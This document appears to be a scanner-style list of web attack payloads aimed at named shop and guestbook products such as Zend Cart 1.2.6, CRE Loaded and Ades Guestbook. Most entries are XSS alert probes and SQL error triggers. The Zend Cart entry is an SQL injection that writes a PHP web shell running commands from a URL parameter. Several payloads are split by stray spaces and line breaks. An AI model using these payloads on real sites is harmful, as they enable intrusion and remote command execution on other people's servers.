Zend Cart 1.2.6 SQL Injection

admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0

+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend

Lizard Cart CMS v.1.0.4 SQL Injection

detail.php?id=-1'

My Amazon Store Manager v1.0 XSS

/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel

CRE Loaded v.6.15 XSS

/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/

script%3E&Mode=apparel

NZ Ecommerce SQL Injection

/index.php?action=Information&informationID=1%20and%20generate_error=error






Ades Guestbook v.2.0 XSS

read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3

C%2Fscript%3E